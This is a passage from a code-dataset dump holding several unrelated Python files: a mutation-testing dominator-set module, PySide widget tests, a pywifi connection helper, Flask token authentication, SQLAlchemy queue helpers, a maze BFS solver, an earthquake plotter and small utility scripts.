One of\n these sets only contains name identifiers, whereas the second one\n contains node objects.\n\n\n Parameters:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n\n Returns:\n (tuple of three): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n\n graph = Graph()\n\n # initiate nodes and add them to the graph\n for mutant in kill_map:\n node = Node(mutant, kill_map.get(mutant))\n graph.add_node(node)\n\n # If possible, create edges between the nodes in the graph\n graph.create_edges()\n\n # Create a set of dominator mutants.\n # Any mutant(node) that doesn't have a parent is a dominator mutant\n dominator_mutants_set = set()\n dominator_mutants_set_actual_mutant = list()\n for mutants in graph.nodes:\n if mutants.parents == None or len(mutants.parents) == 0:\n dominator_mutants_set.add(mutants.mutant_identifier)\n dominator_mutants_set_actual_mutant.append(mutants)\n\n return graph, dominator_mutants_set, dominator_mutants_set_actual_mutant\n\n\ndef convert_csv_to_killmap(csv_filename):\n \"\"\"Converts a CSV file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n readerSize = csv.reader(File)\n\n # skipping the header\n next(reader)\n # print(readerSize)\n empty_csv_check = next(readerSize, \"empty\")\n if empty_csv_check != \"empty\" and len(empty_csv_check) == 2:\n\n for k, y in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n\n return kill_map\n else:\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n return kill_map\n\n\ndef generate_dominator_set_with_csv(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\ndef generate_dominator_set_with_csv_3_cols(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document 
generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap_3_columns(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\n# TODO remove\ndef convert_csv_to_killmap_3_columns(csv_filename):\n \"\"\"Converts a CSV(with 3 columns) file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n\n # skipping the header\n next(reader)\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({y})\n s = kill_map.get(j, set())\n s.add(k)\n kill_map[j] = s\n return kill_map\n\n\n#TODO remove\ndef generate_dominator_set_with_csv_3_col(csv_filename):\n \"\"\"Calculates a dominating set of mutants given a CSV(3 columns) file containing the\n mapping from mutants to tests the kill\n\n See documentation for convert_csv_to_killmap and\n calculate_dominating_mutants.\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n (tuple): containing\n graph : Graph\n The graph containing nodes that represent mutants\n dominator_mutants_set: set[int]\n The set of name identifiers of mutants in a dominating set.\n dominator_mutants_set_actual_mutant: set[Node]\n The set of Node objects representing mutants in a dominating\n set.\n \"\"\"\n kill_map = convert_csv_to_killmap_3_columns(csv_filename)\n return calculate_dominating_mutants(kill_map)\n\n\n# TODO fix documentation\ndef convert_csv_to_reverse_killmap(csv_filename):\n \"\"\"Converts a CSV file generated in Major framework to a killmap\n\n Parameters:\n csv_filename: .csv document\n A csv document generated by the Major framework containing a\n mapping from mutants to the tests they kill\n\n Returns:\n kill_map: A mapping from a set of identifiers from mutants killed to a\n set of identifiers for tests that kill each mutant.\n \"\"\"\n with open(csv_filename, newline='') as File:\n kill_map = {}\n reader = csv.reader(File)\n readerSize = csv.reader(File)\n\n # skipping the header\n next(reader)\n # print(readerSize)\n empty_csv_check = next(readerSize, \"empty\")\n if empty_csv_check != \"empty\" and len(empty_csv_check) == 2:\n\n for k, y in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({k})\n s = kill_map.get(j, set())\n s.add(y)\n kill_map[j] = s\n\n return kill_map\n else:\n for k, y, extra_column in reader:\n # converting to integers\n k = int(k)\n y = int(y)\n j = frozenset({k})\n s = kill_map.get(j, set())\n s.add(y)\n kill_map[j] = s\n return kill_map\n\n\n# TODO document\ndef convert_csv_to_unique_killmap(csv_filename):\n # generate the graph\n graph = generate_dominator_set_with_csv(csv_filename)[0]\n nodes = graph.nodes\n unique_killmap: Optional[dict] = dict()\n for node in nodes:\n 
unique_killmap[node.mutant_identifier] = node.tests\n\n return unique_killmap\n\n\ndef convert_csv_to_unique_reverse_killmap(csv_filename):\n \"\"\"Inverts the unique killmap so that each test maps to the mutant\n identifiers it kills.\n \"\"\"\n killmap = convert_csv_to_unique_killmap(csv_filename)\n unique_reverse_killmap: Optional[dict] = dict()\n for mutant in killmap:\n for test in killmap[mutant]:\n s = unique_reverse_killmap.get(test, set())\n s.add(mutant)\n unique_reverse_killmap[test] = s\n return unique_reverse_killmap\n","repo_name":"ardier/minimal-dominator-mutant-set-generator","sub_path":"dominator_mutants.py","file_name":"dominator_mutants.py","file_ext":"py","file_size_in_byte":23025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7939449514","text":"from observ import reactive\nimport pytest\n\npytest.importorskip(\"PySide6\")\n\nfrom PySide6 import QtWidgets\n\nimport collagraph as cg\n\n\ndef test_widget_size():\n    renderer = cg.PySideRenderer(autoshow=False)\n    widget = renderer.create_element(\"widget\")\n    renderer.set_attribute(widget, \"size\", (600, 400))\n\n    assert widget.size().width() == 600\n    assert widget.size().height() == 400\n\n\ndef test_widget_close():\n    closed = False\n\n    def close(event):\n        nonlocal closed\n        closed = True\n\n    renderer = cg.PySideRenderer(autoshow=False)\n    widget = renderer.create_element(\"widget\")\n    renderer.add_event_listener(widget, \"close\", close)\n\n    widget.close()\n\n    assert closed is True\n\n\ndef test_widget_as_window(qapp, qtbot):\n    renderer = cg.PySideRenderer(autoshow=False)\n    gui = cg.Collagraph(renderer=renderer, event_loop_type=cg.EventLoopType.QT)\n    gui.render(cg.h(\"widget\", {}), qapp)\n\n    def check_widget_as_window():\n        windows = qapp.topLevelWidgets()\n        assert len(windows) == 1\n\n    qtbot.waitUntil(check_widget_as_window, timeout=500)\n\n\ndef test_widget_switch_layouts(qapp, qtbot):\n    def SwitchLayouts(props):\n        return cg.h(\"widget\", {\"layout\": {**props[\"layout\"]}})\n\n    state = reactive({\"layout\": {\"type\": \"box\"}})\n\n    renderer = cg.PySideRenderer(autoshow=False)\n    gui = cg.Collagraph(renderer=renderer, event_loop_type=cg.EventLoopType.QT)\n    gui.render(cg.h(SwitchLayouts, state), qapp)\n\n    widget = None\n\n    def check_widget():\n        nonlocal widget\n        windows = qapp.topLevelWidgets()\n        assert len(windows) == 1\n        widget = windows[0]\n\n    qtbot.waitUntil(check_widget, timeout=1500)\n    qtbot.waitUntil(\n        lambda: isinstance(widget.layout(), QtWidgets.QBoxLayout), timeout=500\n    )\n\n    state[\"layout\"][\"type\"] = \"grid\"\n\n    qtbot.waitUntil(\n        lambda: isinstance(widget.layout(), QtWidgets.QGridLayout), timeout=500\n    )\n\n    state[\"layout\"][\"type\"] = \"form\"\n\n    qtbot.waitUntil(\n        lambda: isinstance(widget.layout(), QtWidgets.QFormLayout), timeout=500\n    )\n\n    state[\"layout\"][\"type\"] = \"box\"\n\n    qtbot.waitUntil(\n        lambda: isinstance(widget.layout(), QtWidgets.QBoxLayout), timeout=500\n    )\n","repo_name":"fork-tongue/collagraph","sub_path":"tests/pyside/test_widget.py","file_name":"test_widget.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"34775155917","text":"# -*- coding:utf-8 -*-\nimport sys\nimport os\nimport time\nimport pywifi\nfrom pywifi import const\n\n# WiFi tool that simulates a client automatically connecting and disconnecting\nclass WiFi_tool(object):\n\n    def __init__(self):\n        # grab the wireless interface and initialise it\n        self.wifi=pywifi.PyWiFi()\n        self.iface=self.wifi.interfaces()[0]\n        # print(self.iface)\n    \n    def get_interface_name(self):\n        # get the name of the current wireless interface\n        self.name=self.iface.name()\n        print(self.name)\n        
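# hand the name back as well so callers can log or reuse it\n        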
return self.name\n\n    def scan_wifi(self):\n        # What we get at first is a list, and the list holds the wireless NIC objects.\n        # A computer may have more than one NIC, so take care to pick the right one;\n        # if the wrong NIC is chosen, the program hangs and produces no result.\n        # ssid is the network name, signal is the signal strength\n        self.iface.scan()\n        time.sleep(3)\n        result=self.iface.scan_results()\n        # print(result)\n        for i in range(len(result)):\n            _ssid=result[i].ssid.encode(\"UTF-8\")\n            _signal=result[i].signal\n            _bssid=result[i].bssid\n            print(u'SSID:%s,BSSID:%s,Signal:%s' % (_ssid.decode('UTF-8','strict'),_bssid,_signal))\n\n    def connect_wifi(self,ssid,pwd):\n        self.iface.disconnect()\n        time.sleep(1)\n        profile=pywifi.Profile()\n        profile.ssid=ssid\n        profile.auth=const.AUTH_ALG_OPEN\n        profile.akm.append(const.AKM_TYPE_WPA2PSK)\n        profile.cipher=const.CIPHER_TYPE_CCMP\n        profile.key=pwd\n        \n        self.iface.remove_all_network_profiles()\n        tmp_profile=self.iface.add_network_profile(profile)\n        \n        self.iface.connect(tmp_profile)\n        time.sleep(8)\n        \n        if self.iface.status() == const.IFACE_CONNECTED:\n            # return u'the wireless NIC connected to the SSID successfully'\n            print(u'connected to the SSID successfully')\n            return True\n        else:\n            # return u'the wireless NIC failed to connect to the SSID'\n            print(u'failed to connect to the SSID')\n            return False\n    \n    def disconnect_wifi(self):\n        # drop the wireless connection\n        self.iface.disconnect()\n        if self.iface.status() == const.IFACE_DISCONNECTED:\n            print(u'disconnected from the WiFi successfully')\n            return True\n        else:\n            print(u'failed to disconnect from the WiFi')\n            return False\n\n    def get_current_ssid(self):\n        # result=os.system(u\"netsh wlan show interfaces\")\n        result=os.popen(u\"netsh wlan show interfaces |findstr SSID\")\n        # split the string to pull the SSID value out\n        text_str=result.read().split('\\n')[0].split(' ')[-1].strip()\n        # print(text_str)\n        return text_str\n    \n    def sys_ping(self,n):\n        # ping the device's LAN IP to check whether the connection works\n        # result=os.system(u'ping 192.168.1.1 -n %s' % n)\n        re=os.popen(u'ping 192.168.1.1 -n %s' % n)\n        text_str=re.read().strip()\n        return text_str\n\n    # def test_wifi(self,time,f):\n        # i=0\n        # while i<= f:\n            # self.connect_wifi(ssid,pwd)\n            # # time.sleep(time)\n            # self.sys_ping(time)\n            # self.disconnect_wifi()\n            # f=f+1\n\n# class WRLO:\n    # def write(self,msg): \n        # fd = open(\"log.log\",'a+')\n        # fd.write(msg)\n        #fd.flush()\n    \nif __name__ == \"__main__\":\n    test=WiFi_tool()\n    # test.scan_wifi()\n    # test.get_interface_name()\n    # test.connect_wifi(ssid='WiFi-Test',pwd='12345678')\n    test.get_current_ssid()\n    # test.test_wifi(time=5,f=3)\n    # sys.stdout = WRLO()\n    # test.sys_ping(n=5)\n    # get_current_ssid()","repo_name":"alanfanh/wifi-tool","sub_path":"src/wifi_tool.py","file_name":"wifi_tool.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10415236748","text":"import logging\n\nfrom flask_restful import reqparse, abort\nimport flask_restful\nfrom flask import current_app, request, g\nfrom functools import wraps\nfrom jormungandr.exceptions import RegionNotFound\nimport datetime\nimport base64\nfrom navitiacommon.models import User, Instance, db\n\n\ndef authentification_required(func):\n    \"\"\"\n    decorator in charge of authenticating requests\n    works for every API that takes a region parameter\n    if the region is missing from the request, the request is automatically authorized\n    \"\"\"\n    @wraps(func)\n    def wrapper(*args, **kwargs):\n        region = None\n        if 'region' in kwargs:\n            region = kwargs['region']\n        # TODO rethink how we handle lon/lat\n        elif 'lon' in kwargs and 'lat' in kwargs:\n            try:\n                from jormungandr import i_manager  # quick fix to avoid circular dependencies\n                region = i_manager.key_of_coord(lon=kwargs['lon'],\n                                                lat=kwargs['lat'])\n            except RegionNotFound:\n                pass\n\n        if not region:\n            # we could not find any region, we abort\n            
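# abort_request() answers 403 when a user is identified and 401 otherwise\n            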
abort_request()\n\n        if not region or authenticate(region, 'ALL', abort=True):\n            return func(*args, **kwargs)\n\n    return wrapper\n\n\ndef get_token():\n    \"\"\"\n    find the Token in the \"Authorization\" HTTP header\n    two cases are handled:\n    - the token is the only value in the header\n    - Basic Authentication is used and the token is in the username part\n      In this case the value of the header looks like this:\n      \"BASIC 54651a4ae4rae\"\n      The second part is the username and the password separated by a \":\"\n      and encoded in base64\n    \"\"\"\n    if 'Authorization' not in request.headers:\n        return None\n\n    args = request.headers['Authorization'].split(' ')\n    if len(args) == 2:\n        try:\n            b64 = args[1]\n            # decode the base64 payload into a str so it can be split on ':'\n            decoded = base64.b64decode(b64).decode()\n            return decoded.split(':')[0]\n        except ValueError:\n            return None\n    else:\n        return request.headers['Authorization']\n\n\ndef authenticate(region, api, abort=False):\n    \"\"\"\n    Check the Authorization of the current user for this region and this API.\n    If abort is True, the request is aborted with the appropriate HTTP code.\n    \"\"\"\n    if 'PUBLIC' in current_app.config \\\n            and current_app.config['PUBLIC']:\n        # if jormungandr is in public mode we skip the authentication process\n        return True\n\n    token = get_token()\n\n    if not token:\n        if abort:\n            abort_request()\n        else:\n            return False\n\n    user = get_user()\n    if user:\n        if user.has_access(region, api):\n            return True\n        else:\n            if abort:\n                abort_request()\n            else:\n                return False\n    else:\n        if abort:\n            abort_request()\n        else:\n            return False\n\ndef abort_request():\n    \"\"\"\n    abort a request with the proper http status in case of authentication issues\n    \"\"\"\n    if get_user():\n        flask_restful.abort(403)\n    else:\n        flask_restful.abort(401)\n\ndef has_access(instance, abort=False):\n    if 'PUBLIC' in current_app.config \\\n            and current_app.config['PUBLIC']:\n        # if jormungandr is in public mode we skip the authentication process\n        return True\n    res = instance.is_accessible_by(get_user())\n    if abort and not res:\n        abort_request()\n    else:\n        return res\n\ndef get_user(abort_if_no_token=True):\n    \"\"\"\n    return the current authenticated User or None\n    \"\"\"\n    if hasattr(g, 'user'):\n        return g.user\n    else:\n        token = get_token()\n        if not token:\n            # a token is mandatory for non public jormungandr\n            if not current_app.config.get('PUBLIC', False):\n                if abort_if_no_token:\n                    flask_restful.abort(401)\n                else:\n                    return None\n            else:  # for public one we allow unknown user\n                g.user = User(login=\"unknown_user\")\n                g.user.id = 0\n        else:\n            g.user = User.get_from_token(token, datetime.datetime.now())\n\n        logging.debug('user %s', g.user)\n\n        return g.user\n","repo_name":"morphalus/navitia","sub_path":"source/jormungandr/jormungandr/authentification.py","file_name":"authentification.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"21894747188","text":"from sqlalchemy.orm import Session\nfrom typing import Union, List\n\nfrom common.constants import QUEUE_CURRENT\n\nfrom ..models import BuildQueueModel\n\n\n__all__ = [\"info_already_saved\", \"current_build_info\",\n           \"get_all_queues\", \"get_queue_by_id\", \"delete_by_id\", \"set_metro_pid\", \"set_process_id\"]\n\n\ndef info_already_saved(session: Session, commit_hash: str) -> bool:\n    \"\"\"Function to check if the commit data is already saved in DB or not\n\n    Args:\n        session (Session): sqlalchemy session\n        commit_hash (str): commit hash\n\n    Returns:\n        bool: returns True if the data already exists in DB 
else False\n    \"\"\"\n    exists = session.query(BuildQueueModel).filter(\n        BuildQueueModel.commit_hash == commit_hash).exists()\n    exists = session.query(exists).scalar()\n    return exists\n\n\ndef current_build_info(session: Session) -> Union[None, BuildQueueModel]:\n    \"\"\"Function to get currently building process info\n\n    Args:\n        session (Session): sqlalchemy session\n\n    Returns:\n        Union[None, BuildQueueModel]: returns None if no current build process running else returns the data\n    \"\"\"\n    data = session.query(BuildQueueModel).filter(\n        BuildQueueModel.queue_status == QUEUE_CURRENT).first()\n    return data\n\n\ndef get_all_queues(session: Session) -> List[BuildQueueModel]:\n    \"\"\"Function to get all the data inside BuildQueue Table\n\n    Args:\n        session (Session): sqlalchemy session\n\n    Returns:\n        List[BuildQueueModel]: returns every row of the table (an empty list if there is none)\n    \"\"\"\n    data = session.query(BuildQueueModel).all()\n    return data\n\n\ndef get_queue_by_id(session: Session, id: int) -> Union[None, BuildQueueModel]:\n    \"\"\"Function to get queue data by queue id\n\n    Args:\n        session (Session): sqlalchemy session\n        id (int): queue id \n\n    Returns:\n        Union[None, BuildQueueModel]: returns data if exists else None\n    \"\"\"\n    data = session.query(BuildQueueModel).get(id)\n    return data\n\n\ndef delete_by_id(session: Session, id: int):\n    \"\"\"Function to delete queue data by id\n\n    Args:\n        session (Session): sqlalchemy session\n        id (int): queue id\n    \"\"\"\n    data = session.query(BuildQueueModel).get(id)\n    session.delete(data)\n    session.commit()\n\n\ndef set_metro_pid(session: Session, commit_hash: str, pid: int):\n    \"\"\"Function to save metro server process id to DB\n\n    Args:\n        session (Session): sqlalchemy session\n        commit_hash (str): commit hash\n        pid (int): process id\n    \"\"\"\n    data = session.query(BuildQueueModel).filter(\n        BuildQueueModel.commit_hash == commit_hash).first()\n\n    data.metro_pid = pid\n    session.commit()\n\n\ndef set_process_id(session: Session, commit_hash: str, pid: int):\n    \"\"\"Function to save running process id eg. \"pod install\", \"yarn install\" etc\n\n    Args:\n        session (Session): sqlalchemy session\n        commit_hash (str): commit hash\n        pid (int): process id\n    \"\"\"\n    data = session.query(BuildQueueModel).filter(\n        BuildQueueModel.commit_hash == commit_hash).first()\n\n    data.process_pid = pid\n    session.commit()\n","repo_name":"SameerNaing/auto-build","sub_path":"db/helpers/buildQueueModelHelpers.py","file_name":"buildQueueModelHelpers.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"635991915","text":"# minimum number of cells passed through when moving from (1,1) to (N,M)\n# when moving from one cell to another, only adjacent cells may be entered\n# took about 40 minutes ~\nfrom collections import deque\n\nn, m = map(int, input().split())\n# minimum number of cells\n# bfs \ndx = [-1, 1, 0, 0] # up, down, left, right\ndy = [0, 0, -1, 1] # up, down, left, right\n# (n,m)\n\ndef bfs(graph, a, b):\n    q = deque() # queue of visited positions to process \n    q.append((a, b))\n    # if we added 1 to the count every time we found a 1, we would be printing\n    # the total number of 1s in the grid, \n    # not the number of cells passed through while escaping the maze, so we must not add 1 to count whenever a 1 appears.
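 Instead, each visited cell\n    # stores the running distance so far: graph[nx][ny] = graph[x][y] + 1.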
\n    # graph[a][b] = 0\n    # count += 1 \n\n    while q:\n        x, y = q.popleft()\n\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n\n            # bounds check so the position cannot leave the grid \n            if nx < 0 or nx >= n or ny < 0 or ny >= m:\n                continue\n\n            # 0 is a wall, so we cannot move there\n            if graph[nx][ny] == 0:\n                continue\n\n            # open cell, so move \n            if graph[nx][ny] == 1:\n                q.append((nx, ny))\n                graph[nx][ny] = graph[x][y] + 1\n                #graph[nx][ny] = 0\n                #count += 1\n    \n    return graph[n-1][m-1]\n\nmiro = []\nfor i in range(n):\n    miro.append(list(map(int, input()))) \n\n\nprint(bfs(miro, 0, 0))\nprint(miro)\n","repo_name":"sihyeon3523/Algorithm","sub_path":"Algorithm_Study/bj2178.py","file_name":"bj2178.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25433541813","text":"import os\r\nimport glob\r\nfrom datetime import datetime, timedelta\r\nimport time\r\nimport numpy as np\r\nimport json\r\nimport geopy.distance\r\nimport urllib.request\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport math\r\nfrom getseiscoords import getseiscoords  # assumption: the local helper module defines a function with the same name\r\n\r\ntimesave = False\r\n\r\ndef plotquakes(start, end, timesave=False):\r\n    #download and parse geojson from USGS\r\n    \r\n    def converttime(inputtime,zone,beginorend,timeformat,timesave=None):\r\n        if beginorend == 'begin':\r\n            inputtime = start - (60*60*24)\r\n        else: \r\n            inputtime = start + (60*60*24)\r\n        if zone == 'UTC':\r\n            inputtime = datetime.utcfromtimestamp(inputtime)\r\n        else:\r\n            inputtime = datetime.fromtimestamp(inputtime)\r\n        if timeformat == 'url':\r\n            inputtime = inputtime.strftime(\"%Y%m%d_%H%M\")\r\n        elif timeformat == 'USGS':\r\n            inputtime = inputtime.strftime(\"%Y-%m-%dT%H:%M:%S\")\r\n        else: \r\n            inputtime = inputtime.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n        return inputtime\r\n    \r\n    urltime_start = []\r\n    urltime_end = []\r\n    urltime = []\r\n    \r\n    urltime_start = converttime(urltime_start,'UTC','begin','USGS')\r\n    urltime_end = converttime(urltime_end,'UTC','end','USGS')\r\n    urltime = converttime(urltime,'local','begin','url')\r\n    titletime = converttime(urltime,'local','begin','title')\r\n    \r\n    #request url format \r\n    #https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=2014-01-01&endtime=2014-01-02&minmagnitude=1.5\r\n    print('Getting data from USGS')\r\n    \r\n    urlUSGS = 'https://earthquake.usgs.gov/fdsnws/event/1/query?format=geojson&starttime=' #start of url\r\n    urlUSGS = urlUSGS + urltime_start + '&endtime=' + urltime_end + '&minmagnitude=1.5' #append times based on above calculations\r\n    \r\n    #open from url\r\n    #format: two digit mag_length of time.geojson\r\n    #with urllib.request.urlopen(\"https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/1.0_week.geojson\") as url:\r\n        #data = json.loads(url.read().decode()) #read geojson file\r\n    \r\n    with urllib.request.urlopen(urlUSGS) as url: \r\n        data = json.loads(url.read().decode()) #read geojson file\r\n    \r\n    \r\n    #parse features in data\r\n    print('Reformatting USGS data')\r\n    quakelist = []\r\n    quakeplottime = []\r\n    quakeplotdist = []\r\n    quakeplotmag = []\r\n    quakeplotdepth = []\r\n    quakeplotlogdepth = []\r\n    detectablequakedist = []\r\n    detectablequaketime = []\r\n    for feature in data['features']:\r\n        i = []\r\n        i.append(feature['properties']['place']) #place name\r\n        i.append(feature['geometry']['coordinates']) #coordinates on earth\r\n        seismag = feature['properties']['mag']\r\n        i.append(seismag) #moment magnitude\r\n        \r\n        seistime = (feature['properties']['time'])/1000\r\n        i.append(seistime) #earthquake 
initiation time \r\n        \r\n        earthquakecoords = feature['geometry']['coordinates'] \r\n        quakedepth = earthquakecoords[2]\r\n        earthquakecoords = [earthquakecoords[1],earthquakecoords[0]] #remove depth\r\n        seiscoords = getseiscoords() #seismometer location\r\n        seisdist = round(geopy.distance.geodesic(earthquakecoords, seiscoords).km)\r\n        if quakedepth > (seisdist / 10): #if depth is large relative to distance of quake\r\n            seisdist = math.sqrt((quakedepth ** 2) + (seisdist ** 2))\r\n        i.append(seisdist) #distance between earthquake and seismometer, rounded to nearest km\r\n        seisdeltat = abs((seisdist/2)-60) #time difference between earthquake and expected arrival\r\n        if (seistime + seisdeltat) > end:\r\n            continue #if earthquake is expected to arrive after end of recording\r\n        if (seistime + seisdeltat) < start:\r\n            continue #if earthquake is expected to arrive before beginning of recording\r\n        i.append(seisdeltat+seistime) #earthquake arrival time relative to start of program (i.e. referenced to timems)\r\n        \r\n        if 8 * math.exp((0.535 * seismag)) > seisdist:\r\n            detectablequakedist.append(seisdist)\r\n            detectablequaketime.append(seistime)\r\n        \r\n        quakelist.append(i) #append above to list of earthquakes in machine-readable form\r\n        \r\n        quakeplottime.append(seistime)\r\n        quakeplotdist.append(seisdist)\r\n        quakeplotmag.append(seismag)\r\n        quakeplotlogdepth.append(-np.log(abs(quakedepth) + 0.001))\r\n        quakeplotdepth.append(quakedepth)\r\n        \r\n    fig = plt.figure()\r\n    ax = Axes3D(fig)\r\n    ax.scatter(quakeplottime,quakeplotdist,quakeplotmag,c=quakeplotdepth,s=10)\r\n    #s=quakeplotmag makes dots too small and hard to distinguish\r\n    ax.set_ylabel('Distance (km)')\r\n    ax.set_xlabel('Seconds since epoch')\r\n    ax.set_zlabel('Magnitude')\r\n    plt.title(titletime)\r\n    plt.show()\r\n    if timesave == True:\r\n        plt.savefig(urltime + 'earthquakemap.png')\r\n    return(quakelist)\r\n\r\n#Approximate filesizes\r\nfor file in glob.glob(r\"C:\\*.csv\"):\r\n    sizefile = os.path.getsize(file)/1000\r\n    starttime_s = os.path.getctime(file)\r\n    endtime_s = (sizefile / 14.9) + starttime_s\r\n    plotquakes(starttime_s,endtime_s,timesave=False)\r\n","repo_name":"Dilong-paradoxus/Seismometer","sub_path":"plot_quakes.py","file_name":"plot_quakes.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33561758793","text":"\"\"\"A robot moves in a plane starting from the original point (0,0). The robot can move toward UP, DOWN, LEFT and RIGHT. Write a program to compute the distance between the current position and the original point after a sequence of movements. 
If the distance is a float, then just print the nearest integer\"\"\"\n\n#import math \n\nimport math\n#initiate the robot position\npos = [0,0]\nwhile True:\n s = input()\n if not s:\n break\n#movement can be split using whitespace\n\n movement = s.split(\" \")\n direction = movement[0]\n steps = int(movement[1])\n if direction==\"UP\":\n pos[0]+=steps\n elif direction==\"DOWN\":\n pos[0]-=steps\n elif direction==\"LEFT\":\n pos[1]-=steps\n elif direction==\"RIGHT\":\n pos[1]+=steps\n else:\n pass\n#calculate the traveling position and print the answer \n\nprint(int(round(math.sqrt(pos[1]**2+pos[0]**2))))\n","repo_name":"Saranya-sharvi/saranya-training-prgm","sub_path":"exc-pgm/robotmath.py","file_name":"robotmath.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24311128551","text":"import openpyxl\nimport os\n\n# os.getcwd()\n# os.chdir() # change working directory\n# os.path.abspath('.')\n# os.listdir()\n# os.path.getsize('excel/example.xlsx')\n\nwb = openpyxl.load_workbook('excel/example.xlsx')\n# wb.sheetnames\nsheet = wb['Sheet1']\n\n# sheet['A1'].value # datetime.datetime(2015, 4, 5, 13, 34, 2)\n# sheet['B1'].value # 'Apples'\n\nfor i in range(1, 8):\n a = sheet.cell(row=i, column=1).value\n b = sheet.cell(row=i, column=2).value\n print(a, b)\n","repo_name":"aleksmn/PyAutomateStuff","sub_path":"excel_spreadsheets.py","file_name":"excel_spreadsheets.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14205920184","text":"import os\nfrom PIL import Image\nfrom tqdm import tqdm\n\ndef find_bounding_box(image, alpha_threshold=50):\n pixels = image.load()\n min_x, min_y = image.size\n max_x = max_y = 0\n\n for x in range(image.width):\n for y in range(image.height):\n if pixels[x, y][3] >= alpha_threshold:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n\n return (min_x, min_y, max_x, max_y)\n\ndef find_bounding_box_rgb(image, color_difference_threshold=50):\n bg_color = image.getpixel((0, 0))\n min_x, min_y = image.size\n max_x = max_y = 0\n\n for x in range(image.width):\n for y in range(image.height):\n pixel_color = image.getpixel((x, y))\n color_difference = sum(abs(bg_color[i] - pixel_color[i]) for i in range(3))\n\n if color_difference >= color_difference_threshold:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n \n return (min_x, min_y, max_x, max_y)\n\ndef crop_image(image):\n if image.mode == \"RGBA\":\n bbox = find_bounding_box(image)\n else:\n bbox = find_bounding_box_rgb(image)\n return image.crop(bbox)\n\nscript_dir = os.path.dirname(os.path.abspath(__file__))\n\ninput_directory = os.path.join(script_dir, \"images\")\noutput_directory = os.path.join(script_dir, \"processed\")\n\nif not os.path.exists(output_directory):\n os.makedirs(output_directory)\n\nimage_extensions = [\".bmp\", \".gif\", \".jpg\", \".jpeg\", \".png\", \".tif\", \".tiff\", \".webp\"]\nimage_files = [f for f in os.listdir(input_directory) if any(f.endswith(ext) for ext in 